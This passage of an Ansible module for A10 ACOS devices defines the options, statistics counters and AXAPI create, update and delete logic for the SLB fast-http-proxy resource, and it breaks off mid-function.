510;\n 'response_6xx'= Status code 6XX; 'response_unknown'= Status code unknown;\n 'req_http10'= Request 1.0; 'req_http11'= Request 1.1; 'response_http10'= Resp\n 1.0; 'response_http11'= Resp 1.1; 'req_get'= Method GET; 'req_head'= Method\n HEAD; 'req_put'= Method PUT; 'req_post'= Method POST; 'req_trace'= Method\n TRACE; 'req_options'= Method OPTIONS; 'req_connect'= Method CONNECT;\n 'req_delete'= Method DELETE; 'req_unknown'= Method UNKNOWN; 'req_content_len'=\n Req content len; 'rsp_content_len'= Resp content len; 'rsp_chunk'= Resp chunk\n encoding; 'req_chunk'= Req chunk encoding; 'compress_rsp'= Compress req;\n 'compress_del_accept_enc'= Compress del accept enc;\n 'compress_resp_already_compressed'= Resp already compressed;\n 'compress_content_type_excluded'= Compress cont type excl;\n 'compress_no_content_type'= Compress no cont type; 'compress_resp_lt_min'=\n Compress resp less than min; 'compress_resp_no_cl_or_ce'= Compress resp no\n CL/CE; 'compress_ratio_too_high'= Compress ratio too high; 'cache_rsp'= HTTP\n req (cache succ); 'close_on_ddos'= Close on DDoS; 'req_http10_keepalive'= 1.0\n Keepalive; 'req_sz_1k'= Req less than equal to 1K; 'req_sz_2k'= Req less than\n equal to 2K;\"\n type: str\n counters2:\n description:\n - \"'req_sz_4k'= Req less than equal to 4K; 'req_sz_8k'= Req less than equal to 8K;\n 'req_sz_16k'= Req less than equal to 16K; 'req_sz_32k'= Req less than equal to\n 32K; 'req_sz_64k'= Req less than equal to 64K; 'req_sz_256k'= Req less than\n equal to 256K; 'req_sz_gt_256k'= Req greater than 256K; 'rsp_sz_1k'= Resp 
less\n than equal to 1K; 'rsp_sz_2k'= Resp less than equal to 2K; 'rsp_sz_4k'= Resp\n less than equal to 4K; 'rsp_sz_8k'= Resp less than equal to 8K; 'rsp_sz_16k'=\n Resp less than equal to 16K; 'rsp_sz_32k'= Resp less than equal to 32K;\n 'rsp_sz_64k'= Resp less than equal to 64K; 'rsp_sz_256k'= Resp less than equal\n to 256K; 'rsp_sz_gt_256k'= Resp greater than 256K; 'chunk_sz_512'= Chunk less\n than equal to 512; 'chunk_sz_1k'= Chunk less than equal to 1K; 'chunk_sz_2k'=\n Chunk less than equal to 2K; 'chunk_sz_4k'= Chunk less than equal to 4K;\n 'chunk_sz_gt_4k'= Chunk greater than 4K; 'pconn_connecting'= pconn connecting;\n 'pconn_connected'= pconn connected; 'pconn_connecting_failed'= pconn conn\n failed; 'chunk_bad'= Bad Chunk; 'req_10u'= Rsp time less than 10u; 'req_20u'=\n Rsp time less than 20u; 'req_50u'= Rsp time less than 50u; 'req_100u'= Rsp time\n less than 100u; 'req_200u'= Rsp time less than 200u; 'req_500u'= Rsp time less\n than 500u; 'req_1m'= Rsp time less than 1m; 'req_2m'= Rsp time less than 2m;\n 'req_5m'= Rsp time less than 5m; 'req_10m'= Rsp time less than 10m; 'req_20m'=\n Rsp time less than 20m; 'req_50m'= Rsp time less than 50m; 'req_100m'= Rsp time\n less than 100m; 'req_200m'= Rsp time less than 200m; 'req_500m'= Rsp time less\n than 500m; 'req_1s'= Rsp time less than 1s; 'req_2s'= Rsp time less than 2s;\n 'req_5s'= Rsp time less than 5s; 'req_over_5s'= Rsp time greater than equal to\n 5s; 'insert_client_port'= Insert client Port; 'req_track'= Method TRACK;\n 'full_proxy_put'= Full proxy PUT; 'non_http_bypass'= Non-HTTP bypass;\n 'skip_insert_client_ip'= Skip Insert Client IP; 'skip_insert_client_port'= Skip\n Insert Client Port; 'decompression_before'= Tot data before decompress;\n 'decompression_after'= Tot data after decompress; 'http_pkts_in_seq'= Tot In-\n seq fHTTP packets; 'http_pkts_retx'= Tot Re-Tx fHTTP packets;\n 'http_client_retx'= Client Re-Tx fHTTP packets; 'http_server_retx'= Server Re-\n Tx fHTTP packets; 'http_pkts_ofo'= fHTTP Out of Order packets;\"\n type: str\n oper:\n description:\n - \"Field oper\"\n type: dict\n required: False\n suboptions:\n fast_http_proxy_cpu_list:\n description:\n - \"Field fast_http_proxy_cpu_list\"\n type: list\n cpu_count:\n description:\n - \"Field cpu_count\"\n type: int\n debug_fields:\n description:\n - \"Field debug_fields\"\n type: bool\n stats:\n description:\n - \"Field stats\"\n type: dict\n required: False\n suboptions:\n curr_proxy:\n description:\n - \"Curr Proxy Conns\"\n type: str\n total_proxy:\n description:\n - \"Total Proxy Conns\"\n type: str\n req:\n description:\n - \"HTTP requests\"\n type: str\n req_succ:\n description:\n - \"HTTP requests(succ)\"\n type: str\n noproxy:\n description:\n - \"No proxy error\"\n type: str\n client_rst:\n description:\n - \"Client RST\"\n type: str\n server_rst:\n description:\n - \"Server RST\"\n type: str\n notuple:\n description:\n - \"No tuple error\"\n type: str\n parsereq_fail:\n description:\n - \"Parse req fail\"\n type: str\n svrsel_fail:\n description:\n - \"Server selection fail\"\n type: str\n fwdreq_fail:\n description:\n - \"Fwd req fail\"\n type: str\n fwdreqdata_fail:\n description:\n - \"Fwd req data fail\"\n type: str\n req_retran:\n description:\n - \"Packets retrans\"\n type: str\n req_ofo:\n description:\n - \"Packets ofo\"\n type: str\n server_resel:\n description:\n - \"Server reselection\"\n type: str\n svr_prem_close:\n description:\n - \"Server premature close\"\n type: str\n new_svrconn:\n description:\n - \"Server conn made\"\n type: 
str\n snat_fail:\n description:\n - \"Source NAT failure\"\n type: str\n tcpoutrst:\n description:\n - \"Out RSTs\"\n type: str\n full_proxy:\n description:\n - \"Full proxy tot\"\n type: str\n full_proxy_post:\n description:\n - \"Full proxy POST\"\n type: str\n full_proxy_pipeline:\n description:\n - \"Full proxy pipeline\"\n type: str\n full_proxy_fpga_err:\n description:\n - \"Full proxy fpga err\"\n type: str\n req_over_limit:\n description:\n - \"Request over limit\"\n type: str\n req_rate_over_limit:\n description:\n - \"Request rate over limit\"\n type: str\n close_on_ddos:\n description:\n - \"Close on DDoS\"\n type: str\n full_proxy_put:\n description:\n - \"Full proxy PUT\"\n type: str\n\n'''\n\nRETURN = r'''\nmodified_values:\n description:\n - Values modified (or potential changes if using check_mode) as a result of task operation\n returned: changed\n type: dict\naxapi_calls:\n description: Sequential list of AXAPI calls made by the task\n returned: always\n type: list\n elements: dict\n contains:\n endpoint:\n description: The AXAPI endpoint being accessed.\n type: str\n sample:\n - /axapi/v3/slb/virtual_server\n - /axapi/v3/file/ssl-cert\n http_method:\n description:\n - HTTP method being used by the primary task to interact with the AXAPI endpoint.\n type: str\n sample:\n - POST\n - GET\n request_body:\n description: Params used to query the AXAPI\n type: complex\n response_body:\n description: Response from the AXAPI\n type: complex\n'''\n\nEXAMPLES = \"\"\"\n\"\"\"\n\nimport copy\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils import \\\n errors as a10_ex\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils import \\\n wrapper as api_client\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils import \\\n utils\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils.client import \\\n client_factory\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils.kwbl import \\\n KW_OUT, translate_blacklist as translateBlacklist\n\n# Hacky way of having access to object properties for evaluation\nAVAILABLE_PROPERTIES = [\"oper\", \"sampling_enable\", \"stats\", \"uuid\", ]\n\n\ndef get_default_argspec():\n return dict(\n ansible_host=dict(type='str', required=True),\n ansible_username=dict(type='str', required=True),\n ansible_password=dict(type='str', required=True, no_log=True),\n state=dict(type='str', default=\"present\", choices=['noop', 'present', 'absent']),\n ansible_port=dict(type='int', choices=[80, 443], required=True),\n a10_partition=dict(type='str', required=False,\n ),\n a10_device_context_id=dict(type='int', choices=[1, 2, 3, 4, 5, 6, 7, 8], required=False,\n ),\n get_type=dict(type='str', choices=[\"single\", \"list\", \"oper\", \"stats\"]),\n )\n\n\ndef get_argspec():\n rv = get_default_argspec()\n rv.update({\n 'uuid': {\n 'type': 'str',\n },\n 'sampling_enable': {\n 'type': 'list',\n 'counters1': {\n 'type':\n 'str',\n 'choices': [\n 'all', 'num', 'curr_proxy', 'total_proxy', 'req', 'req_succ', 'noproxy', 'client_rst', 'server_rst', 'notuple', 'parsereq_fail', 'svrsel_fail', 'fwdreq_fail', 'fwdreq_fail_buff', 'fwdreq_fail_rport', 'fwdreq_fail_route', 'fwdreq_fail_persist', 'fwdreq_fail_server', 'fwdreq_fail_tuple', 'fwdreqdata_fail', 'req_retran', 'req_ofo',\n 'server_resel', 'svr_prem_close', 'new_svrconn', 'snat_fail', 'tcpoutrst', 'full_proxy', 'full_proxy_post', 'full_proxy_pipeline', 'full_proxy_fpga_err', 'req_over_limit', 'req_rate_over_limit', 
'l4_switching', 'cookie_switching', 'aflex_switching', 'http_policy_switching', 'url_switching', 'host_switching', 'lb_switching',\n 'l4_switching_ok', 'cookie_switching_ok', 'aflex_switching_ok', 'http_policy_switching_ok', 'url_switching_ok', 'host_switching_ok', 'lb_switching_ok', 'l4_switching_enqueue', 'cookie_switching_enqueue', 'aflex_switching_enqueue', 'http_policy_switching_enqueue', 'url_switching_enqueue', 'host_switching_enqueue',\n 'lb_switching_enqueue', 'retry_503', 'aflex_retry', 'aflex_lb_reselect', 'aflex_lb_reselect_ok', 'client_rst_request', 'client_rst_connecting', 'client_rst_connected', 'client_rst_response', 'server_rst_request', 'server_rst_connecting', 'server_rst_connected', 'server_rst_response', 'invalid_header', 'too_many_headers',\n 'line_too_long', 'header_name_too_long', 'wrong_resp_header', 'header_insert', 'header_delete', 'insert_client_ip', 'negative_req_remain', 'negative_resp_remain', 'large_cookie', 'large_cookie_header', 'huge_cookie', 'huge_cookie_header', 'parse_cookie_fail', 'parse_setcookie_fail', 'asm_cookie_fail', 'asm_cookie_header_fail',\n 'asm_setcookie_fail', 'asm_setcookie_header_fail', 'client_req_unexp_flag', 'connecting_fin', 'connecting_fin_retrans', 'connecting_fin_ofo', 'connecting_rst', 'connecting_rst_retrans', 'connecting_rst_ofo', 'connecting_ack', 'pkts_ofo', 'pkts_retrans', 'pkts_retrans_ack_finwait', 'pkts_retrans_fin', 'pkts_retrans_rst',\n 'pkts_retrans_push', 'stale_sess', 'server_resel_failed', 'compression_before', 'compression_after', 'response_1xx', 'response_100', 'response_101', 'response_102', 'response_2xx', 'response_200', 'response_201', 'response_202', 'response_203', 'response_204', 'response_205', 'response_206', 'response_207', 'response_3xx',\n 'response_300', 'response_301', 'response_302', 'response_303', 'response_304', 'response_305', 'response_306', 'response_307', 'response_4xx', 'response_400', 'response_401', 'response_402', 'response_403', 'response_404', 'response_405', 'response_406', 'response_407', 'response_408', 'response_409', 'response_410',\n 'response_411', 'response_412', 'response_413', 'response_414', 'response_415', 'response_416', 'response_417', 'response_418', 'response_422', 'response_423', 'response_424', 'response_425', 'response_426', 'response_449', 'response_450', 'response_5xx', 'response_500', 'response_501', 'response_502', 'response_503',\n 'response_504', 'response_505', 'response_506', 'response_507', 'response_508', 'response_509', 'response_510', 'response_6xx', 'response_unknown', 'req_http10', 'req_http11', 'response_http10', 'response_http11', 'req_get', 'req_head', 'req_put', 'req_post', 'req_trace', 'req_options', 'req_connect', 'req_delete',\n 'req_unknown', 'req_content_len', 'rsp_content_len', 'rsp_chunk', 'req_chunk', 'compress_rsp', 'compress_del_accept_enc', 'compress_resp_already_compressed', 'compress_content_type_excluded', 'compress_no_content_type', 'compress_resp_lt_min', 'compress_resp_no_cl_or_ce', 'compress_ratio_too_high', 'cache_rsp', 'close_on_ddos',\n 'req_http10_keepalive', 'req_sz_1k', 'req_sz_2k'\n ]\n },\n 'counters2': {\n 'type':\n 'str',\n 'choices': [\n 'req_sz_4k', 'req_sz_8k', 'req_sz_16k', 'req_sz_32k', 'req_sz_64k', 'req_sz_256k', 'req_sz_gt_256k', 'rsp_sz_1k', 'rsp_sz_2k', 'rsp_sz_4k', 'rsp_sz_8k', 'rsp_sz_16k', 'rsp_sz_32k', 'rsp_sz_64k', 'rsp_sz_256k', 'rsp_sz_gt_256k', 'chunk_sz_512', 'chunk_sz_1k', 'chunk_sz_2k', 'chunk_sz_4k', 'chunk_sz_gt_4k', 'pconn_connecting',\n 'pconn_connected', 'pconn_connecting_failed', 'chunk_bad', 
'req_10u', 'req_20u', 'req_50u', 'req_100u', 'req_200u', 'req_500u', 'req_1m', 'req_2m', 'req_5m', 'req_10m', 'req_20m', 'req_50m', 'req_100m', 'req_200m', 'req_500m', 'req_1s', 'req_2s', 'req_5s', 'req_over_5s', 'insert_client_port', 'req_track', 'full_proxy_put',\n 'non_http_bypass', 'skip_insert_client_ip', 'skip_insert_client_port', 'decompression_before', 'decompression_after', 'http_pkts_in_seq', 'http_pkts_retx', 'http_client_retx', 'http_server_retx', 'http_pkts_ofo'\n ]\n }\n },\n 'oper': {\n 'type': 'dict',\n 'fast_http_proxy_cpu_list': {\n 'type': 'list',\n 'curr_proxy': {\n 'type': 'int',\n },\n 'total_proxy': {\n 'type': 'int',\n },\n 'req': {\n 'type': 'int',\n },\n 'req_succ': {\n 'type': 'int',\n },\n 'noproxy': {\n 'type': 'int',\n },\n 'client_rst': {\n 'type': 'int',\n },\n 'server_rst': {\n 'type': 'int',\n },\n 'notuple': {\n 'type': 'int',\n },\n 'parsereq_fail': {\n 'type': 'int',\n },\n 'svrsel_fail': {\n 'type': 'int',\n },\n 'fwdreq_fail': {\n 'type': 'int',\n },\n 'fwdreq_fail_buff': {\n 'type': 'int',\n },\n 'fwdreq_fail_rport': {\n 'type': 'int',\n },\n 'fwdreq_fail_route': {\n 'type': 'int',\n },\n 'fwdreq_fail_persist': {\n 'type': 'int',\n },\n 'fwdreq_fail_server': {\n 'type': 'int',\n },\n 'fwdreq_fail_tuple': {\n 'type': 'int',\n },\n 'fwdreqdata_fail': {\n 'type': 'int',\n },\n 'req_retran': {\n 'type': 'int',\n },\n 'req_ofo': {\n 'type': 'int',\n },\n 'server_resel': {\n 'type': 'int',\n },\n 'svr_prem_close': {\n 'type': 'int',\n },\n 'new_svrconn': {\n 'type': 'int',\n },\n 'snat_fail': {\n 'type': 'int',\n },\n 'tcpoutrst': {\n 'type': 'int',\n },\n 'full_proxy': {\n 'type': 'int',\n },\n 'full_proxy_post': {\n 'type': 'int',\n },\n 'full_proxy_put': {\n 'type': 'int',\n },\n 'full_proxy_pipeline': {\n 'type': 'int',\n },\n 'full_proxy_fpga_err': {\n 'type': 'int',\n },\n 'req_over_limit': {\n 'type': 'int',\n },\n 'req_rate_over_limit': {\n 'type': 'int',\n },\n 'l4_switching': {\n 'type': 'int',\n },\n 'cookie_switching': {\n 'type': 'int',\n },\n 'aflex_switching': {\n 'type': 'int',\n },\n 'url_switching': {\n 'type': 'int',\n },\n 'host_switching': {\n 'type': 'int',\n },\n 'lb_switching': {\n 'type': 'int',\n },\n 'l4_switching_ok': {\n 'type': 'int',\n },\n 'cookie_switching_ok': {\n 'type': 'int',\n },\n 'aflex_switching_ok': {\n 'type': 'int',\n },\n 'url_switching_ok': {\n 'type': 'int',\n },\n 'host_switching_ok': {\n 'type': 'int',\n },\n 'lb_switching_ok': {\n 'type': 'int',\n },\n 'l4_switching_enqueue': {\n 'type': 'int',\n },\n 'cookie_switching_enqueue': {\n 'type': 'int',\n },\n 'aflex_switching_enqueue': {\n 'type': 'int',\n },\n 'url_switching_enqueue': {\n 'type': 'int',\n },\n 'host_switching_enqueue': {\n 'type': 'int',\n },\n 'lb_switching_enqueue': {\n 'type': 'int',\n },\n 'retry_503': {\n 'type': 'int',\n },\n 'aflex_retry': {\n 'type': 'int',\n },\n 'aflex_lb_reselect': {\n 'type': 'int',\n },\n 'aflex_lb_reselect_ok': {\n 'type': 'int',\n },\n 'client_rst_request': {\n 'type': 'int',\n },\n 'client_rst_connecting': {\n 'type': 'int',\n },\n 'client_rst_connected': {\n 'type': 'int',\n },\n 'client_rst_response': {\n 'type': 'int',\n },\n 'server_rst_request': {\n 'type': 'int',\n },\n 'server_rst_connecting': {\n 'type': 'int',\n },\n 'server_rst_connected': {\n 'type': 'int',\n },\n 'server_rst_response': {\n 'type': 'int',\n },\n 'invalid_header': {\n 'type': 'int',\n },\n 'too_many_headers': {\n 'type': 'int',\n },\n 'line_too_long': {\n 'type': 'int',\n },\n 'header_name_too_long': {\n 'type': 'int',\n },\n 
'wrong_resp_header': {\n 'type': 'int',\n },\n 'header_insert': {\n 'type': 'int',\n },\n 'header_delete': {\n 'type': 'int',\n },\n 'insert_client_ip': {\n 'type': 'int',\n },\n 'negative_req_remain': {\n 'type': 'int',\n },\n 'negative_resp_remain': {\n 'type': 'int',\n },\n 'large_cookie': {\n 'type': 'int',\n },\n 'large_cookie_header': {\n 'type': 'int',\n },\n 'huge_cookie': {\n 'type': 'int',\n },\n 'huge_cookie_header': {\n 'type': 'int',\n },\n 'parse_cookie_fail': {\n 'type': 'int',\n },\n 'parse_setcookie_fail': {\n 'type': 'int',\n },\n 'asm_cookie_fail': {\n 'type': 'int',\n },\n 'asm_cookie_header_fail': {\n 'type': 'int',\n },\n 'asm_setcookie_fail': {\n 'type': 'int',\n },\n 'asm_setcookie_header_fail': {\n 'type': 'int',\n },\n 'client_req_unexp_flag': {\n 'type': 'int',\n },\n 'connecting_fin': {\n 'type': 'int',\n },\n 'connecting_fin_retrans': {\n 'type': 'int',\n },\n 'connecting_fin_ofo': {\n 'type': 'int',\n },\n 'connecting_rst': {\n 'type': 'int',\n },\n 'connecting_rst_retrans': {\n 'type': 'int',\n },\n 'connecting_rst_ofo': {\n 'type': 'int',\n },\n 'connecting_ack': {\n 'type': 'int',\n },\n 'pkts_ofo': {\n 'type': 'int',\n },\n 'pkts_retrans': {\n 'type': 'int',\n },\n 'pkts_retrans_ack_finwait': {\n 'type': 'int',\n },\n 'pkts_retrans_fin': {\n 'type': 'int',\n },\n 'pkts_retrans_rst': {\n 'type': 'int',\n },\n 'pkts_retrans_push': {\n 'type': 'int',\n },\n 'stale_sess': {\n 'type': 'int',\n },\n 'server_resel_failed': {\n 'type': 'int',\n },\n 'response_1xx': {\n 'type': 'int',\n },\n 'response_100': {\n 'type': 'int',\n },\n 'response_101': {\n 'type': 'int',\n },\n 'response_102': {\n 'type': 'int',\n },\n 'response_2xx': {\n 'type': 'int',\n },\n 'response_200': {\n 'type': 'int',\n },\n 'response_201': {\n 'type': 'int',\n },\n 'response_202': {\n 'type': 'int',\n },\n 'response_203': {\n 'type': 'int',\n },\n 'response_204': {\n 'type': 'int',\n },\n 'response_205': {\n 'type': 'int',\n },\n 'response_206': {\n 'type': 'int',\n },\n 'response_207': {\n 'type': 'int',\n },\n 'response_3xx': {\n 'type': 'int',\n },\n 'response_300': {\n 'type': 'int',\n },\n 'response_301': {\n 'type': 'int',\n },\n 'response_302': {\n 'type': 'int',\n },\n 'response_303': {\n 'type': 'int',\n },\n 'response_304': {\n 'type': 'int',\n },\n 'response_305': {\n 'type': 'int',\n },\n 'response_306': {\n 'type': 'int',\n },\n 'response_307': {\n 'type': 'int',\n },\n 'response_4xx': {\n 'type': 'int',\n },\n 'response_400': {\n 'type': 'int',\n },\n 'response_401': {\n 'type': 'int',\n },\n 'response_402': {\n 'type': 'int',\n },\n 'response_403': {\n 'type': 'int',\n },\n 'response_404': {\n 'type': 'int',\n },\n 'response_405': {\n 'type': 'int',\n },\n 'response_406': {\n 'type': 'int',\n },\n 'response_407': {\n 'type': 'int',\n },\n 'response_408': {\n 'type': 'int',\n },\n 'response_409': {\n 'type': 'int',\n },\n 'response_410': {\n 'type': 'int',\n },\n 'response_411': {\n 'type': 'int',\n },\n 'response_412': {\n 'type': 'int',\n },\n 'response_413': {\n 'type': 'int',\n },\n 'response_414': {\n 'type': 'int',\n },\n 'response_415': {\n 'type': 'int',\n },\n 'response_416': {\n 'type': 'int',\n },\n 'response_417': {\n 'type': 'int',\n },\n 'response_418': {\n 'type': 'int',\n },\n 'response_422': {\n 'type': 'int',\n },\n 'response_423': {\n 'type': 'int',\n },\n 'response_424': {\n 'type': 'int',\n },\n 'response_425': {\n 'type': 'int',\n },\n 'response_426': {\n 'type': 'int',\n },\n 'response_449': {\n 'type': 'int',\n },\n 'response_450': {\n 'type': 'int',\n 
},\n 'response_5xx': {\n 'type': 'int',\n },\n 'response_500': {\n 'type': 'int',\n },\n 'response_501': {\n 'type': 'int',\n },\n 'response_502': {\n 'type': 'int',\n },\n 'response_503': {\n 'type': 'int',\n },\n 'response_504': {\n 'type': 'int',\n },\n 'response_505': {\n 'type': 'int',\n },\n 'response_506': {\n 'type': 'int',\n },\n 'response_507': {\n 'type': 'int',\n },\n 'response_508': {\n 'type': 'int',\n },\n 'response_509': {\n 'type': 'int',\n },\n 'response_510': {\n 'type': 'int',\n },\n 'response_6xx': {\n 'type': 'int',\n },\n 'response_unknown': {\n 'type': 'int',\n },\n 'req_http10': {\n 'type': 'int',\n },\n 'req_http11': {\n 'type': 'int',\n },\n 'response_http10': {\n 'type': 'int',\n },\n 'response_http11': {\n 'type': 'int',\n },\n 'req_get': {\n 'type': 'int',\n },\n 'req_head': {\n 'type': 'int',\n },\n 'req_put': {\n 'type': 'int',\n },\n 'req_post': {\n 'type': 'int',\n },\n 'req_trace': {\n 'type': 'int',\n },\n 'req_options': {\n 'type': 'int',\n },\n 'req_connect': {\n 'type': 'int',\n },\n 'req_delete': {\n 'type': 'int',\n },\n 'req_unknown': {\n 'type': 'int',\n },\n 'req_content_len': {\n 'type': 'int',\n },\n 'rsp_content_len': {\n 'type': 'int',\n },\n 'rsp_chunk': {\n 'type': 'int',\n },\n 'req_chunk': {\n 'type': 'int',\n },\n 'compress_rsp': {\n 'type': 'int',\n },\n 'compress_rsp_br': {\n 'type': 'int',\n },\n 'compress_rsp_total': {\n 'type': 'int',\n },\n 'compress_del_accept_enc': {\n 'type': 'int',\n },\n 'compress_resp_already_compressed': {\n 'type': 'int',\n },\n 'compress_content_type_excluded': {\n 'type': 'int',\n },\n 'compress_no_content_type': {\n 'type': 'int',\n },\n 'compress_resp_lt_min': {\n 'type': 'int',\n },\n 'compress_resp_no_cl_or_ce': {\n 'type': 'int',\n },\n 'compress_ratio_too_high': {\n 'type': 'int',\n },\n 'cache_rsp': {\n 'type': 'int',\n },\n 'close_on_ddos': {\n 'type': 'int',\n },\n 'req_http10_keepalive': {\n 'type': 'int',\n },\n 'req_sz_1k': {\n 'type': 'int',\n },\n 'req_sz_2k': {\n 'type': 'int',\n },\n 'req_sz_4k': {\n 'type': 'int',\n },\n 'req_sz_8k': {\n 'type': 'int',\n },\n 'req_sz_16k': {\n 'type': 'int',\n },\n 'req_sz_32k': {\n 'type': 'int',\n },\n 'req_sz_64k': {\n 'type': 'int',\n },\n 'req_sz_256k': {\n 'type': 'int',\n },\n 'req_sz_gt_256k': {\n 'type': 'int',\n },\n 'rsp_sz_1k': {\n 'type': 'int',\n },\n 'rsp_sz_2k': {\n 'type': 'int',\n },\n 'rsp_sz_4k': {\n 'type': 'int',\n },\n 'rsp_sz_8k': {\n 'type': 'int',\n },\n 'rsp_sz_16k': {\n 'type': 'int',\n },\n 'rsp_sz_32k': {\n 'type': 'int',\n },\n 'rsp_sz_64k': {\n 'type': 'int',\n },\n 'rsp_sz_256k': {\n 'type': 'int',\n },\n 'rsp_sz_gt_256k': {\n 'type': 'int',\n },\n 'chunk_sz_512': {\n 'type': 'int',\n },\n 'chunk_sz_1k': {\n 'type': 'int',\n },\n 'chunk_sz_2k': {\n 'type': 'int',\n },\n 'chunk_sz_4k': {\n 'type': 'int',\n },\n 'chunk_sz_gt_4k': {\n 'type': 'int',\n },\n 'pconn_connecting': {\n 'type': 'int',\n },\n 'pconn_connected': {\n 'type': 'int',\n },\n 'pconn_connecting_failed': {\n 'type': 'int',\n },\n 'chunk_bad': {\n 'type': 'int',\n },\n 'req_10u': {\n 'type': 'int',\n },\n 'req_20u': {\n 'type': 'int',\n },\n 'req_50u': {\n 'type': 'int',\n },\n 'req_100u': {\n 'type': 'int',\n },\n 'req_200u': {\n 'type': 'int',\n },\n 'req_500u': {\n 'type': 'int',\n },\n 'req_1m': {\n 'type': 'int',\n },\n 'req_2m': {\n 'type': 'int',\n },\n 'req_5m': {\n 'type': 'int',\n },\n 'req_10m': {\n 'type': 'int',\n },\n 'req_20m': {\n 'type': 'int',\n },\n 'req_50m': {\n 'type': 'int',\n },\n 'req_100m': {\n 'type': 'int',\n },\n 'req_200m': {\n 
'type': 'int',\n },\n 'req_500m': {\n 'type': 'int',\n },\n 'req_1s': {\n 'type': 'int',\n },\n 'req_2s': {\n 'type': 'int',\n },\n 'req_5s': {\n 'type': 'int',\n },\n 'req_over_5s': {\n 'type': 'int',\n },\n 'insert_client_port': {\n 'type': 'int',\n },\n 'req_track': {\n 'type': 'int',\n },\n 'non_http_bypass': {\n 'type': 'int',\n },\n 'skip_insert_client_ip': {\n 'type': 'int',\n },\n 'skip_insert_client_port': {\n 'type': 'int',\n },\n 'http_pkts_ofo': {\n 'type': 'int',\n }\n },\n 'cpu_count': {\n 'type': 'int',\n },\n 'debug_fields': {\n 'type': 'bool',\n }\n },\n 'stats': {\n 'type': 'dict',\n 'curr_proxy': {\n 'type': 'str',\n },\n 'total_proxy': {\n 'type': 'str',\n },\n 'req': {\n 'type': 'str',\n },\n 'req_succ': {\n 'type': 'str',\n },\n 'noproxy': {\n 'type': 'str',\n },\n 'client_rst': {\n 'type': 'str',\n },\n 'server_rst': {\n 'type': 'str',\n },\n 'notuple': {\n 'type': 'str',\n },\n 'parsereq_fail': {\n 'type': 'str',\n },\n 'svrsel_fail': {\n 'type': 'str',\n },\n 'fwdreq_fail': {\n 'type': 'str',\n },\n 'fwdreqdata_fail': {\n 'type': 'str',\n },\n 'req_retran': {\n 'type': 'str',\n },\n 'req_ofo': {\n 'type': 'str',\n },\n 'server_resel': {\n 'type': 'str',\n },\n 'svr_prem_close': {\n 'type': 'str',\n },\n 'new_svrconn': {\n 'type': 'str',\n },\n 'snat_fail': {\n 'type': 'str',\n },\n 'tcpoutrst': {\n 'type': 'str',\n },\n 'full_proxy': {\n 'type': 'str',\n },\n 'full_proxy_post': {\n 'type': 'str',\n },\n 'full_proxy_pipeline': {\n 'type': 'str',\n },\n 'full_proxy_fpga_err': {\n 'type': 'str',\n },\n 'req_over_limit': {\n 'type': 'str',\n },\n 'req_rate_over_limit': {\n 'type': 'str',\n },\n 'close_on_ddos': {\n 'type': 'str',\n },\n 'full_proxy_put': {\n 'type': 'str',\n }\n }\n })\n return rv\n\n\ndef existing_url(module):\n \"\"\"Return the URL for an existing resource\"\"\"\n # Build the format dictionary\n url_base = \"/axapi/v3/slb/fast-http-proxy\"\n\n f_dict = {}\n\n return url_base.format(**f_dict)\n\n\ndef new_url(module):\n \"\"\"Return the URL for creating a resource\"\"\"\n # To create the URL, we need to take the format string and return it with no params\n url_base = \"/axapi/v3/slb/fast-http-proxy\"\n\n f_dict = {}\n\n return url_base.format(**f_dict)\n\n\ndef report_changes(module, result, existing_config, payload):\n change_results = copy.deepcopy(result)\n if not existing_config:\n change_results[\"modified_values\"].update(**payload)\n return change_results\n\n config_changes = copy.deepcopy(existing_config)\n for k, v in payload[\"fast-http-proxy\"].items():\n v = 1 if str(v).lower() == \"true\" else v\n v = 0 if str(v).lower() == \"false\" else v\n\n if config_changes[\"fast-http-proxy\"].get(k) != v:\n change_results[\"changed\"] = True\n config_changes[\"fast-http-proxy\"][k] = v\n\n change_results[\"modified_values\"].update(**config_changes)\n return change_results\n\n\ndef create(module, result, payload={}):\n call_result = api_client.post(module.client, new_url(module), payload)\n result[\"axapi_calls\"].append(call_result)\n result[\"modified_values\"].update(**call_result[\"response_body\"])\n result[\"changed\"] = True\n return result\n\n\ndef update(module, result, existing_config, payload={}):\n call_result = api_client.post(module.client, existing_url(module), payload)\n result[\"axapi_calls\"].append(call_result)\n if call_result[\"response_body\"] == existing_config:\n result[\"changed\"] = False\n else:\n result[\"modified_values\"].update(**call_result[\"response_body\"])\n result[\"changed\"] = True\n return result\n\n\ndef 
present(module, result, existing_config):\n payload = utils.build_json(\"fast-http-proxy\", module.params, AVAILABLE_PROPERTIES)\n change_results = report_changes(module, result, existing_config, payload)\n if module.check_mode:\n return change_results\n elif not existing_config:\n return create(module, result, payload)\n elif existing_config and change_results.get('changed'):\n return update(module, result, existing_config, payload)\n return result\n\n\ndef delete(module, result):\n try:\n call_result = api_client.delete(module.client, existing_url(module))\n result[\"axapi_calls\"].append(call_result)\n result[\"changed\"] = True\n except a10_ex.NotFound:\n result[\"changed\"] = False\n return result\n\n\ndef absent(module, result, existing_config):\n if not existing_config:\n result[\"changed\"] = False\n return result\n\n if module.check_mode:\n result[\"changed\"] = True\n return result\n\n return delete(module, result)\n\n\ndef run_command(module):\n result = dict(changed=False, messages=\"\", modified_values={}, axapi_calls=[], ansible_facts={}, acos_info={})\n\n state = module.params[\"state\"]\n ansible_host = module.params[\"ansible_host\"]\n ansible_username = module.params[\"ansible_username\"]\n ansible_password = module.params[\"ansible_password\"]\n ansible_port = module.params[\"ansible_port\"]\n a10_partition = module.params[\"a10_partition\"]\n a10_device_context_id = module.params[\"a10_device_context_id\"]\n\n if ansible_port == 80:\n protocol = \"http\"\n elif ansible_port == 443:\n protocol = \"https\"\n\n module.client = client_factory(ansible_host, ansible_port, protocol, ansible_username, ansible_password)\n\n valid = True\n\n run_errors = []\n if state == 'present':\n requires_one_of = sorted([])\n valid, validation_errors = utils.validate(module.params, requires_one_of)\n for ve in validation_errors:\n run_errors.append(ve)\n\n if not valid:\n err_msg = \"\\n\".join(run_errors)\n result[\"messages\"] = \"Validation failure: \" + str(run_errors)\n module.fail_json(msg=err_msg, **result)\n\n try:\n if a10_partition:\n result[\"axapi_calls\"].append(api_client.active_partition(module.client, a10_partition))\n\n if a10_device_context_id:\n 